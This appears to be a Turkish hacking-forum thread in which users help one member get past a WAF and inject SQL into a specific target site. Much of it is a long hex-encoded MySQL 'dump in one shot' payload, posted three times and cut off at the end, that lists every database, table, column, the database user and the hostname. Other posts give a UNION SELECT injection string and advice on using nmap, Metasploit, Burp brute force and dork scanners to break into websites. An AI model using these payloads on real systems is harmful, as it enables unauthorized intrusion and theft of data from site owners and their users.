sqlmap haricinde önerebileceğiniz tool var mı?hacım tool kullansana çeşit çeşit tool var manuel sql injection hamallık vaktine yazık
WAF olduğunu düşünüyorum, bypass etmen gerekiyor. Yanlış biliyorsam, birisi beni düzeltsin. İyi forumlar...
havij vardı bir zamanlar ama çok bilgim yok güncel toolar nedir ne değildir. havij gibi grafik arayüzü olan ve linux dağıtımı gerektirmeyen tooları seviyorum. Zaten gündelik hayatta yeteri kadar terminal ekranı ve kodlara maruz kalıyorum basit işlemler için terminal kullanmaktan gına geliyor o yüzden gui olan tooları seviyorum eğer çok ihtiyaç duyarsam ihtiyacıma göre kendi toolumu kendim yazıyorum genelde. Bunun dışında önerebileceğim bir şey yok maalesefsqlmap haricinde önerebileceğiniz tool var mı?
Elinize Sağlık
deneyip bilgilendirme yapacağımparametrenin arkasına eksi koymayı dene ve çift tırnak yerine tek tırnak koy lang=-eng' union select <kolon sayisi> -- - denermisin '-- -' sorgunun sonununa bunu koyarsan sorguyu server yeme ihtimali yüksektir.
dostum Waf koruması tekrar alıyorum bu bir çözüm olmadı sadece kolon sayısına erişiliyor ondan sonraki işlemlerde waf koruması devreye giriyor diğer Dios mysqllere de baktım lakin bir çözüm bulamadım farklı yöntemlere başvurucam arkadaşın Havji dediği toola bir göz atayım belki de işimi kolaylaştırır sqlmap çok bekletiyor sql manuel injector'de duvar ortaya çıkabiliyorparametrenin arkasına eksi koymayı dene ve çift tırnak yerine tek tırnak koy lang=-eng' union select <kolon sayisi> -- - denermisin '-- -' sorgunun sonununa bunu koyarsan sorguyu server yeme ihtimali yüksektir.
concat%280x3c2f686561643e3c626f6479206267636f6c6f72203d20626c61636b3e3c62723e3c68313e4b6c6176796573697a206b616c64c4b1c49fc4b16e207a616d616e20616e6c617273c4b16e20626972206461686120627520616c656d6465206b69207261636f6e61206b6172c4b1c59f6d6179616361c49fc4b16ec4b1213c2f68313e3c62723e3c666f6e742073697a653d3720636f6c6f723d626c75653e4461746162617365203a20,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f722e726573696d6c696e6b2e636f6d2f5f3130414a2e706e67222077696474683d223139353022206865696768743d2231303530223e3c63656e7465723e,database%28%29,0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f72203d2079656c6c6f772073697a653d363e2055534552203a20,user(),0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d7265642073697a653d373e2048617961742067c3bc7a656c206d69203f,@@HAVE_SYMLINK,0x203c2f666f6e743e3c62723e3c666f6e742073697a65203d203520636f6c6f72203d2079656c6c6f773e20486f73746e616d65203a20,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e68697a6c69726573696d2e636f6d2f364f664c38492e676966222077696474683d2238303022206865696768743d223530223e3c63656e7465723e,@@HOSTNAME,0x3c6469763e3c666f6e7420636f6c6f723d207265643e3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3c2f6469763e3c2f666f6e743e3c2f666f6e743e3c68333e3c666f6e7420636f6c6f72203d726564203e44617461626173657320616e6420436f6c756d6e7320496e666f20203a203c62723e3c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e,%28SELECT%28@y%29FROM%28SELECT%28@y:=0x00%29,%28@NR:=0%29,%28SELECT%280%29FROM%28INFORMATION_SCHEMA.SCHEMATA%29WHERE%28SCHEMA_NAME!=0x696e666f726d6174696f6e5f736368656d612e736368656d617461%29AND%280x00%29IN%28@y:=CONCAT%28@y,LPAD%28@NR:=@NR%2b1,2,0x30%29,0x3a20,schema_name,0x3c62723e%29%29%29%29y%29,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e68697a6c69726573696d2e636f6d2f364f664c38492e676966222077696474683d2238303022206865696768743d223530223e3c63656e7465723e,0x3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d353e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d7e7e7e7e7e7e7e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d3c2f666f6e743e3c62723e,%28select%28@x%29from%28select%28@x:=0x00%29,%28@nr:=0%29,(@tbl:=0x0%29,%28select%280%29from%28information_schema.tables%29where%28table_schema=database%28%29%29and%280x00%29in%28@x:=concat_ws%280x20,@x,lpad%28@nr:=@nr%2b1,3,0x0b%29,0x2e203c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e203a3a3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d79656c6c6f773e20207b2020436f6c756d6e73203a3a205b3c666f6e7420636f6c6f723d7265643e,%28select+count%28*%29+from+information_schema.columns+where+table_name=@tbl%29,0x3c2f666f6e743e5d20207d3c2f666f6e743e3c62723e%29%29%29%29x%29,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e68697a6c69726573696d2e636f6d2f364f664c38492e676966222077696474683d2238303022206865696768743d223530223e3c63656e7465723e,0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d352e333e3d3d3d3d3d7e7e7e7e7e54c39c524b4841434b5445414d7e7e7e7e7e3d3d3d3d3d54c39c524b4841434b5445414d3d3d3d3d3d7e7e7e7e7e54c39c524b4841434b5445414d3d3d3d3d3d7e7e7e7e7e54c39c524b4841434b5445414d7e7e7e7e7e3d3d3d3d3d3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d79656c6c6f772073697a653d343e4578747261637465642044617461203a203c2f666f6e743e3c62723e3c68313e7e3a2048454c4c45522028204853482029205741532048455245203a7e3c2f68313e203c62723e3c64697620616c69676e3d226c656674223e,%28select+concat%280x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e546f74616c20436f6c756d6e20436f756e7420416c6c20446174616261736573203a7e204c6970726f772044494f53207e5b,%28Select+count%28column_name%29from%28information_Schema.columns%29%29,0x5d3c62723e3c62723e2f7e,@%29from%28select%28@:=0x00%29,%28@db:=0%29,%28@db_nr:=0%29,%28@tbl:=0%29,%28@tbl_nr:=0%29,%28@col_nr:=0%29,%28select%28@%29from%28information_Schema.columns%29where%28@%29in%28@:=concat%28@,if%28%28@db!=table_schema%29,concat%28%28@tbl_nr:=0x00%29,0x3c666f6e7420636f6c6f723d7265643e,LPAD%28@db_nr:=@db_nr%2b1,2,0x20%29,0x2e20,@db:=table_schema,0x203c666f6e7420636f6c6f723d707572706c653e207e3a205461626c657320436f756e7420546f74616c203a7e20284c6970726f772044494f5329205b,%28Select+count%28table_name%29from%28information_schema.tables%29where%28table_schema=@db%29%29,0x5d2f7e3c2f666f6e743e3c2f666f6e743e%29,0x00%29,if%28%28@tbl!=table_name%29,concat%28%28@col_nr:=0x00%29,0x3c646976207374796c653d70616464696e672d6c6566743a343070783b3e3c666f6e7420636f6c6f723d626c75653e202020,LPAD%28@tbl_nr:=@tbl_nr%2b1,3,0x0b%29,0x202e20,@tbl:=table_name,0x20202020203c666f6e7420636f6c6f723d707572706c653e2020207b2020436f6c756d6e73203a20284c6970726f772044696f7329207e20205b,%28Select+count%28column_name%29from%28information_Schema.columns%29where%28table_name=@tbl%29%29,0x5d202f203c666f6e7420636f6c6f723d79656c6c6f773e205265636f726473203a204c6970726f772044494f537e205b,%28Select+ifnull%28table_rows,0x30%29+from+information_schema.tables+where+table_name=@tbl%29,0x5d207d3c2f666f6e743e3c2f666f6e743e3c2f666f6e743e3c2f6469763e%29,0x00%29,concat%280x3c646976207374796c653d70616464696e672d6c6566743a383070783b3e3c666f6e7420636f6c6f723d677265656e3e,LPAD%28@col_nr:=@col_nr%2b1,3,0x0b%29,0x2e20,column_name,0x3c2f666f6e743e3c2f6469763e%29%29%29%29%29x%29,0x3c2f6469763e%29
Önerinizi yarın sabah deneyeceğim siz bilgili bir abiye benziyorsunuz umarım bu sefer aradığım çözüme ulaşırım teşekkürlerimi sunarımYorum satırı eklemeyi unutmuşsun ve lang=eng bölümünü silmeyecek şekilde id=352 veya cat_page_stone bölümünden itibaren hata yakalamaya bak. Tek bir görsele hitaben bir çok şey söylenebilir fakat bilgi vermelisin. Yorum satırı ekledikten sonra 23 e bunu monte et bakalım bir:Şunu da unutma bir gün iyi bir manuelci olursan sqlmap kullananlardan pek haz etmezsin...Kod:concat%280x3c2f686561643e3c626f6479206267636f6c6f72203d20626c61636b3e3c62723e3c68313e4b6c6176796573697a206b616c64c4b1c49fc4b16e207a616d616e20616e6c617273c4b16e20626972206461686120627520616c656d6465206b69207261636f6e61206b6172c4b1c59f6d6179616361c49fc4b16ec4b1213c2f68313e3c62723e3c666f6e742073697a653d3720636f6c6f723d626c75653e4461746162617365203a20,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f722e726573696d6c696e6b2e636f6d2f5f3130414a2e706e67222077696474683d223139353022206865696768743d2231303530223e3c63656e7465723e,database%28%29,0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f72203d2079656c6c6f772073697a653d363e2055534552203a20,user(),0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d7265642073697a653d373e2048617961742067c3bc7a656c206d69203f,@@HAVE_SYMLINK,0x203c2f666f6e743e3c62723e3c666f6e742073697a65203d203520636f6c6f72203d2079656c6c6f773e20486f73746e616d65203a20,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e68697a6c69726573696d2e636f6d2f364f664c38492e676966222077696474683d2238303022206865696768743d223530223e3c63656e7465723e,@@HOSTNAME,0x3c6469763e3c666f6e7420636f6c6f723d207265643e3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3c2f6469763e3c2f666f6e743e3c2f666f6e743e3c68333e3c666f6e7420636f6c6f72203d726564203e44617461626173657320616e6420436f6c756d6e7320496e666f20203a203c62723e3c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e,%28SELECT%28@y%29FROM%28SELECT%28@y:=0x00%29,%28@NR:=0%29,%28SELECT%280%29FROM%28INFORMATION_SCHEMA.SCHEMATA%29WHERE%28SCHEMA_NAME!=0x696e666f726d6174696f6e5f736368656d612e736368656d617461%29AND%280x00%29IN%28@y:=CONCAT%28@y,LPAD%28@NR:=@NR%2b1,2,0x30%29,0x3a20,schema_name,0x3c62723e%29%29%29%29y%29,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e68697a6c69726573696d2e636f6d2f364f664c38492e676966222077696474683d2238303022206865696768743d223530223e3c63656e7465723e,0x3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d353e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d7e7e7e7e7e7e7e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d3c2f666f6e743e3c62723e,%28select%28@x%29from%28select%28@x:=0x00%29,%28@nr:=0%29,(@tbl:=0x0%29,%28select%280%29from%28information_schema.tables%29where%28table_schema=database%28%29%29and%280x00%29in%28@x:=concat_ws%280x20,@x,lpad%28@nr:=@nr%2b1,3,0x0b%29,0x2e203c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e203a3a3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d79656c6c6f773e20207b2020436f6c756d6e73203a3a205b3c666f6e7420636f6c6f723d7265643e,%28select+count%28*%29+from+information_schema.columns+where+table_name=@tbl%29,0x3c2f666f6e743e5d20207d3c2f666f6e743e3c62723e%29%29%29%29x%29,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e68697a6c69726573696d2e636f6d2f364f664c38492e676966222077696474683d2238303022206865696768743d223530223e3c63656e7465723e,0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d352e333e3d3d3d3d3d7e7e7e7e7e54c39c524b4841434b5445414d7e7e7e7e7e3d3d3d3d3d54c39c524b4841434b5445414d3d3d3d3d3d7e7e7e7e7e54c39c524b4841434b5445414d3d3d3d3d3d7e7e7e7e7e54c39c524b4841434b5445414d7e7e7e7e7e3d3d3d3d3d3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d79656c6c6f772073697a653d343e4578747261637465642044617461203a203c2f666f6e743e3c62723e3c68313e7e3a2048454c4c45522028204853482029205741532048455245203a7e3c2f68313e203c62723e3c64697620616c69676e3d226c656674223e,%28select+concat%280x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e546f74616c20436f6c756d6e20436f756e7420416c6c20446174616261736573203a7e204c6970726f772044494f53207e5b,%28Select+count%28column_name%29from%28information_Schema.columns%29%29,0x5d3c62723e3c62723e2f7e,@%29from%28select%28@:=0x00%29,%28@db:=0%29,%28@db_nr:=0%29,%28@tbl:=0%29,%28@tbl_nr:=0%29,%28@col_nr:=0%29,%28select%28@%29from%28information_Schema.columns%29where%28@%29in%28@:=concat%28@,if%28%28@db!=table_schema%29,concat%28%28@tbl_nr:=0x00%29,0x3c666f6e7420636f6c6f723d7265643e,LPAD%28@db_nr:=@db_nr%2b1,2,0x20%29,0x2e20,@db:=table_schema,0x203c666f6e7420636f6c6f723d707572706c653e207e3a205461626c657320436f756e7420546f74616c203a7e20284c6970726f772044494f5329205b,%28Select+count%28table_name%29from%28information_schema.tables%29where%28table_schema=@db%29%29,0x5d2f7e3c2f666f6e743e3c2f666f6e743e%29,0x00%29,if%28%28@tbl!=table_name%29,concat%28%28@col_nr:=0x00%29,0x3c646976207374796c653d70616464696e672d6c6566743a343070783b3e3c666f6e7420636f6c6f723d626c75653e202020,LPAD%28@tbl_nr:=@tbl_nr%2b1,3,0x0b%29,0x202e20,@tbl:=table_name,0x20202020203c666f6e7420636f6c6f723d707572706c653e2020207b2020436f6c756d6e73203a20284c6970726f772044696f7329207e20205b,%28Select+count%28column_name%29from%28information_Schema.columns%29where%28table_name=@tbl%29%29,0x5d202f203c666f6e7420636f6c6f723d79656c6c6f773e205265636f726473203a204c6970726f772044494f537e205b,%28Select+ifnull%28table_rows,0x30%29+from+information_schema.tables+where+table_name=@tbl%29,0x5d207d3c2f666f6e743e3c2f666f6e743e3c2f666f6e743e3c2f6469763e%29,0x00%29,concat%280x3c646976207374796c653d70616464696e672d6c6566743a383070783b3e3c666f6e7420636f6c6f723d677265656e3e,LPAD%28@col_nr:=@col_nr%2b1,3,0x0b%29,0x2e20,column_name,0x3c2f666f6e743e3c2f6469763e%29%29%29%29%29x%29,0x3c2f6469763e%29
tavsiyen için teşekkürler yeni degilim ama kendimi geniştirmeye çalışıyorumdeneyip bilgilendirme yapacağım
dostum Waf koruması tekrar alıyorum bu bir çözüm olmadı sadece kolon sayısına erişiliyor ondan sonraki işlemlerde waf koruması devreye giriyor diğer Dios mysqllere de baktım lakin bir çözüm bulamadım farklı yöntemlere başvurucam arkadaşın Havji dediği toola bir göz atayım belki de işimi kolaylaştırır sqlmap çok bekletiyor sql manuel injector'de duvar ortaya çıkabiliyor
Benim gibi ilk başlayanlardansan ilk web siteye sızma nmap'i öğrenmeye bak bu biraz uzun süren ve focuslandığın bir site için geçerli port taraması yapıyorsun açık portların detaylarını öğrenmek ve içlerine girmek için de metasploit öğrenmeni öneririm onun haricinde kendini geliştirmek istiyorsan shell öğrenmen iyi olabilir çünkü sonraki işlemler için shell yardım edecek sana ama farklı yollar denemek istiyorsan xss'ye bakabilirsin kali'nin genel olarak toolları yardımcı olur fakat buradaki arkadaşların önerdiği toollar çıkarsa bir dene Exploit ile alakalı toollar var mesela örnek verecek olursam XML-RPC bu toolu forumda görmüştüm arkadaş anlatıyordu basit siteler için işe yarayabilir dork(bir kelime üzerine arama yapmak) aratmak için de THT'imin forumlarına göz atabilirsin Dork Scanner Main diye bir tool çarpmıştı gözüme işine yarayabilir onun haricinde bol bol site hackleme rehberleri ve Batıkentin Web güvenliği eğitimlerine bakmanı öneririm iyi akşamlar.
(Dip not kaba kuvvet saldırısı yani Brute Force bunu genel olarak Burp Suite'te yaparlar onun kullanımı kolaydır çabuk çözersin iki şeye ihtiyacın olur userlist, passlist fakat onunla uğraşmak boşa kürek çekmek gibidir çünkü şans oyununa benzer ya tutarsa her sitenin farklı admin ve şifreleri olacağı sadece bilgisayarını yıpratır diyebilirim)
nmap - zenmap (ikiside aynı şeydir port taraması yapar açık portlar hakkında detaylı bilgi verir sürüm numaraları gibi...
Metasploit (nmap'ten sonraki adımdır portun sürüm numarası bulunur ve o sürüm numarası yazılarak ip adresini ayarlayıp içine girersin basit kullanımı forumlardan bulabilirsin.
VEGA (bilgim yok bunu araştırmadım)
Zapproxy (Owasp) (sitedeki tüm her şeyi tarar ve açık bulursa sarı bayrak, turuncu bayrak, kırmızı bayrak diye 3 sınıfa ayırır
Wp-scan
W3af
Burpsuite işine yarayacak toollardan bir tanesi onu Brute Force terimiyle basitleştirmiş gibi göründüm fakat tek Brute Force yapılmıyor çeşitli payloadlar deneyerek siteye sızma eğilimi gerçekleştirebilirsin işine yarayacaktır xss öğrenmeye özen göstermeni öneririm nmap ile Metaspoit'i öğrenmek kolay sadece xss ile alakalı terimler yorabilir
abi kendin yazdığın dios mu ?Yorum satırı eklemeyi unutmuşsun ve lang=eng bölümünü silmeyecek şekilde id=352 veya cat_page_stone bölümünden itibaren hata yakalamaya bak. Tek bir görsele hitaben bir çok şey söylenebilir fakat bilgi vermelisin. Yorum satırı ekledikten sonra 23 e bunu monte et bakalım bir:Şunu da unutma bir gün iyi bir manuelci olursan sqlmap kullananlardan pek haz etmezsin...Kod:concat%280x3c2f686561643e3c626f6479206267636f6c6f72203d20626c61636b3e3c62723e3c68313e4b6c6176796573697a206b616c64c4b1c49fc4b16e207a616d616e20616e6c617273c4b16e20626972206461686120627520616c656d6465206b69207261636f6e61206b6172c4b1c59f6d6179616361c49fc4b16ec4b1213c2f68313e3c62723e3c666f6e742073697a653d3720636f6c6f723d626c75653e4461746162617365203a20,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f722e726573696d6c696e6b2e636f6d2f5f3130414a2e706e67222077696474683d223139353022206865696768743d2231303530223e3c63656e7465723e,database%28%29,0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f72203d2079656c6c6f772073697a653d363e2055534552203a20,user(),0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d7265642073697a653d373e2048617961742067c3bc7a656c206d69203f,@@HAVE_SYMLINK,0x203c2f666f6e743e3c62723e3c666f6e742073697a65203d203520636f6c6f72203d2079656c6c6f773e20486f73746e616d65203a20,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e68697a6c69726573696d2e636f6d2f364f664c38492e676966222077696474683d2238303022206865696768743d223530223e3c63656e7465723e,@@HOSTNAME,0x3c6469763e3c666f6e7420636f6c6f723d207265643e3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3c2f6469763e3c2f666f6e743e3c2f666f6e743e3c68333e3c666f6e7420636f6c6f72203d726564203e44617461626173657320616e6420436f6c756d6e7320496e666f20203a203c62723e3c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e,%28SELECT%28@y%29FROM%28SELECT%28@y:=0x00%29,%28@NR:=0%29,%28SELECT%280%29FROM%28INFORMATION_SCHEMA.SCHEMATA%29WHERE%28SCHEMA_NAME!=0x696e666f726d6174696f6e5f736368656d612e736368656d617461%29AND%280x00%29IN%28@y:=CONCAT%28@y,LPAD%28@NR:=@NR%2b1,2,0x30%29,0x3a20,schema_name,0x3c62723e%29%29%29%29y%29,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e68697a6c69726573696d2e636f6d2f364f664c38492e676966222077696474683d2238303022206865696768743d223530223e3c63656e7465723e,0x3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d353e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d7e7e7e7e7e7e7e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d3c2f666f6e743e3c62723e,%28select%28@x%29from%28select%28@x:=0x00%29,%28@nr:=0%29,(@tbl:=0x0%29,%28select%280%29from%28information_schema.tables%29where%28table_schema=database%28%29%29and%280x00%29in%28@x:=concat_ws%280x20,@x,lpad%28@nr:=@nr%2b1,3,0x0b%29,0x2e203c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e203a3a3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d79656c6c6f773e20207b2020436f6c756d6e73203a3a205b3c666f6e7420636f6c6f723d7265643e,%28select+count%28*%29+from+information_schema.columns+where+table_name=@tbl%29,0x3c2f666f6e743e5d20207d3c2f666f6e743e3c62723e%29%29%29%29x%29,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e68697a6c69726573696d2e636f6d2f364f664c38492e676966222077696474683d2238303022206865696768743d223530223e3c63656e7465723e,0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d352e333e3d3d3d3d3d7e7e7e7e7e54c39c524b4841434b5445414d7e7e7e7e7e3d3d3d3d3d54c39c524b4841434b5445414d3d3d3d3d3d7e7e7e7e7e54c39c524b4841434b5445414d3d3d3d3d3d7e7e7e7e7e54c39c524b4841434b5445414d7e7e7e7e7e3d3d3d3d3d3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d79656c6c6f772073697a653d343e4578747261637465642044617461203a203c2f666f6e743e3c62723e3c68313e7e3a2048454c4c45522028204853482029205741532048455245203a7e3c2f68313e203c62723e3c64697620616c69676e3d226c656674223e,%28select+concat%280x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e546f74616c20436f6c756d6e20436f756e7420416c6c20446174616261736573203a7e204c6970726f772044494f53207e5b,%28Select+count%28column_name%29from%28information_Schema.columns%29%29,0x5d3c62723e3c62723e2f7e,@%29from%28select%28@:=0x00%29,%28@db:=0%29,%28@db_nr:=0%29,%28@tbl:=0%29,%28@tbl_nr:=0%29,%28@col_nr:=0%29,%28select%28@%29from%28information_Schema.columns%29where%28@%29in%28@:=concat%28@,if%28%28@db!=table_schema%29,concat%28%28@tbl_nr:=0x00%29,0x3c666f6e7420636f6c6f723d7265643e,LPAD%28@db_nr:=@db_nr%2b1,2,0x20%29,0x2e20,@db:=table_schema,0x203c666f6e7420636f6c6f723d707572706c653e207e3a205461626c657320436f756e7420546f74616c203a7e20284c6970726f772044494f5329205b,%28Select+count%28table_name%29from%28information_schema.tables%29where%28table_schema=@db%29%29,0x5d2f7e3c2f666f6e743e3c2f666f6e743e%29,0x00%29,if%28%28@tbl!=table_name%29,concat%28%28@col_nr:=0x00%29,0x3c646976207374796c653d70616464696e672d6c6566743a343070783b3e3c666f6e7420636f6c6f723d626c75653e202020,LPAD%28@tbl_nr:=@tbl_nr%2b1,3,0x0b%29,0x202e20,@tbl:=table_name,0x20202020203c666f6e7420636f6c6f723d707572706c653e2020207b2020436f6c756d6e73203a20284c6970726f772044696f7329207e20205b,%28Select+count%28column_name%29from%28information_Schema.columns%29where%28table_name=@tbl%29%29,0x5d202f203c666f6e7420636f6c6f723d79656c6c6f773e205265636f726473203a204c6970726f772044494f537e205b,%28Select+ifnull%28table_rows,0x30%29+from+information_schema.tables+where+table_name=@tbl%29,0x5d207d3c2f666f6e743e3c2f666f6e743e3c2f666f6e743e3c2f6469763e%29,0x00%29,concat%280x3c646976207374796c653d70616464696e672d6c6566743a383070783b3e3c666f6e7420636f6c6f723d677265656e3e,LPAD%28@col_nr:=@col_nr%2b1,3,0x0b%29,0x2e20,column_name,0x3c2f666f6e743e3c2f6469763e%29%29%29%29%29x%29,0x3c2f6469763e%29
Abi manuel sql i nasıl bu kadar ilerlettin, yol gösterirmisin?Yorum satırı eklemeyi unutmuşsun ve lang=eng bölümünü silmeyecek şekilde id=352 veya cat_page_stone bölümünden itibaren hata yakalamaya bak. Tek bir görsele hitaben bir çok şey söylenebilir fakat bilgi vermelisin. Yorum satırı ekledikten sonra 23 e bunu monte et bakalım bir:Şunu da unutma bir gün iyi bir manuelci olursan sqlmap kullananlardan pek haz etmezsin...Kod:concat%280x3c2f686561643e3c626f6479206267636f6c6f72203d20626c61636b3e3c62723e3c68313e4b6c6176796573697a206b616c64c4b1c49fc4b16e207a616d616e20616e6c617273c4b16e20626972206461686120627520616c656d6465206b69207261636f6e61206b6172c4b1c59f6d6179616361c49fc4b16ec4b1213c2f68313e3c62723e3c666f6e742073697a653d3720636f6c6f723d626c75653e4461746162617365203a20,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f722e726573696d6c696e6b2e636f6d2f5f3130414a2e706e67222077696474683d223139353022206865696768743d2231303530223e3c63656e7465723e,database%28%29,0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f72203d2079656c6c6f772073697a653d363e2055534552203a20,user(),0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d7265642073697a653d373e2048617961742067c3bc7a656c206d69203f,@@HAVE_SYMLINK,0x203c2f666f6e743e3c62723e3c666f6e742073697a65203d203520636f6c6f72203d2079656c6c6f773e20486f73746e616d65203a20,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e68697a6c69726573696d2e636f6d2f364f664c38492e676966222077696474683d2238303022206865696768743d223530223e3c63656e7465723e,@@HOSTNAME,0x3c6469763e3c666f6e7420636f6c6f723d207265643e3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3c2f6469763e3c2f666f6e743e3c2f666f6e743e3c68333e3c666f6e7420636f6c6f72203d726564203e44617461626173657320616e6420436f6c756d6e7320496e666f20203a203c62723e3c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e,%28SELECT%28@y%29FROM%28SELECT%28@y:=0x00%29,%28@NR:=0%29,%28SELECT%280%29FROM%28INFORMATION_SCHEMA.SCHEMATA%29WHERE%28SCHEMA_NAME!=0x696e666f726d6174696f6e5f736368656d612e736368656d617461%29AND%280x00%29IN%28@y:=CONCAT%28@y,LPAD%28@NR:=@NR%2b1,2,0x30%29,0x3a20,schema_name,0x3c62723e%29%29%29%29y%29,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e68697a6c69726573696d2e636f6d2f364f664c38492e676966222077696474683d2238303022206865696768743d223530223e3c63656e7465723e,0x3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d353e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d7e7e7e7e7e7e7e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d3c2f666f6e743e3c62723e,%28select%28@x%29from%28select%28@x:=0x00%29,%28@nr:=0%29,(@tbl:=0x0%29,%28select%280%29from%28information_schema.tables%29where%28table_schema=database%28%29%29and%280x00%29in%28@x:=concat_ws%280x20,@x,lpad%28@nr:=@nr%2b1,3,0x0b%29,0x2e203c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e203a3a3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d79656c6c6f773e20207b2020436f6c756d6e73203a3a205b3c666f6e7420636f6c6f723d7265643e,%28select+count%28*%29+from+information_schema.columns+where+table_name=@tbl%29,0x3c2f666f6e743e5d20207d3c2f666f6e743e3c62723e%29%29%29%29x%29,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e68697a6c69726573696d2e636f6d2f364f664c38492e676966222077696474683d2238303022206865696768743d223530223e3c63656e7465723e,0x3c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d352e333e3d3d3d3d3d7e7e7e7e7e54c39c524b4841434b5445414d7e7e7e7e7e3d3d3d3d3d54c39c524b4841434b5445414d3d3d3d3d3d7e7e7e7e7e54c39c524b4841434b5445414d3d3d3d3d3d7e7e7e7e7e54c39c524b4841434b5445414d7e7e7e7e7e3d3d3d3d3d3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d79656c6c6f772073697a653d343e4578747261637465642044617461203a203c2f666f6e743e3c62723e3c68313e7e3a2048454c4c45522028204853482029205741532048455245203a7e3c2f68313e203c62723e3c64697620616c69676e3d226c656674223e,%28select+concat%280x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e546f74616c20436f6c756d6e20436f756e7420416c6c20446174616261736573203a7e204c6970726f772044494f53207e5b,%28Select+count%28column_name%29from%28information_Schema.columns%29%29,0x5d3c62723e3c62723e2f7e,@%29from%28select%28@:=0x00%29,%28@db:=0%29,%28@db_nr:=0%29,%28@tbl:=0%29,%28@tbl_nr:=0%29,%28@col_nr:=0%29,%28select%28@%29from%28information_Schema.columns%29where%28@%29in%28@:=concat%28@,if%28%28@db!=table_schema%29,concat%28%28@tbl_nr:=0x00%29,0x3c666f6e7420636f6c6f723d7265643e,LPAD%28@db_nr:=@db_nr%2b1,2,0x20%29,0x2e20,@db:=table_schema,0x203c666f6e7420636f6c6f723d707572706c653e207e3a205461626c657320436f756e7420546f74616c203a7e20284c6970726f772044494f5329205b,%28Select+count%28table_name%29from%28information_schema.tables%29where%28table_schema=@db%29%29,0x5d2f7e3c2f666f6e743e3c2f666f6e743e%29,0x00%29,if%28%28@tbl!=table_name%29,concat%28%28@col_nr:=0x00%29,0x3c646976207374796c653d70616464696e672d6c6566743a343070783b3e3c666f6e7420636f6c6f723d626c75653e202020,LPAD%28@tbl_nr:=@tbl_nr%2b1,3,0x0b%29,0x202e20,@tbl:=table_name,0x20202020203c666f6e7420636f6c6f723d707572706c653e2020207b2020436f6c756d6e73203a20284c6970726f772044696f7329207e20205b,%28Select+count%28column_name%29from%28information_Schema.